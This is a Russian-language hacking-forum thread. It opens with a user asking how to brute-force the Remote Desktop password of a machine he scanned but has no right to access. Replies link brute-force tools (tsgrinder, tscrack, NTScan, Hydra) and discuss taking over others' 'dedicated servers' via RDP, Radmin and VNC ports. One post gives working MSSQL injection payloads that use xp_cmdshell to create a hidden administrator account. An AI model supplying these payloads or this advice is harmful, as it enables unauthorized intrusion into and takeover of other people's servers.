Подбор пароля к Remote Desktop Connection

У меня вопросик такой, есть ли прога которая подбирает пароли к Remote Desktop Connection протоколу это порт 3389.

Чё то везде смотрел и не мог найти даже в книжках такой утилиты не видел.

П.С. Недвно ИП просканил и там этот порт открыт причём я спокойно подключился через mstsc вот тока пароля не знаю...

 

там же указаны Параметры входа:
1) Компьютер (имя компа или ip-адрес ввести)
2) Логин пользователя удаленого компьютера
3) Пасс пользователя

То есть тебе надо подбирать пароль к компьютеру (вернее подбирать к логину с админ правами), к каторому ты будешь подключаться...

 

Было видео по подбору пароля, ищи там

 

tsgrinder-2.03 >>

Code:

http://examples.oreilly.com/networksa/tools/tsgrinder-2.03.zip

Для работы нужен модифицированный Terminal Server Client aka roboclient >>

Code:

http://www.securitylab.ru/bitrix/exturl.php?goto=ftp%3A%2F%2Fftp.microsoft.com%2FResKit%2Fwin2000%2Froboclient.zip

tscrack 2.0.55 // 2.1 >> офф сайт разработчиков мерт. ищи


Видео с демонстрацией доступно на milw0rme >>

Code:

http://str0ke213.tradebit.com/pub/8/38.flv

 

а как через гидру бритить порт 3389?

 

У меня такой вопрос есть кроме нт скан какой ещё по словорям и диапозонам брутит а то этот тока пароль по словарю и один айпи -(

 

Как угнать дэд? KPOT_f!nd описал уже.
Конечно, самый лёгкий способ просканить на наличие открытых портов и пробовать коннектиться без пасса, но получается это очень редко. На ачате висит статья крота. более чем понятно.

 

По умолчанию задана политика безопасности (имхо три или 5 неправильных вводов пароля и в баню, так что брутт, имхо не актуален...)

 

Tiler2k
Чтоб не искали долго


Статия про брут Dedicated Server через NTScan на портах 3389,4899.

3389 - удаленный рабочий стол
4899 - радмин
5900 - брут на VNC прочетай .

Кстати видел пост KPOT_find на асечке.ру про добычу дедов через MS SQL тут
Кто то знает как это делать ?

 

Ставь unecs!

 

Есть mssql injection через которые можно выполнять команды на сервере,(Нужно чтоб пользователь БД был sa), если у тебя есть такая инъекция, просто выполняешь команды:
;exec master..xp_cmdshell 'net user Username Password /add';--
;exec master..xp_cmdshell 'net localgroup Administrators Username /add';--

на ачате есть видео как это сделать
http://video.antichat.ru/file229.html

p.s: думаю KPOT_find про такой способ говорил...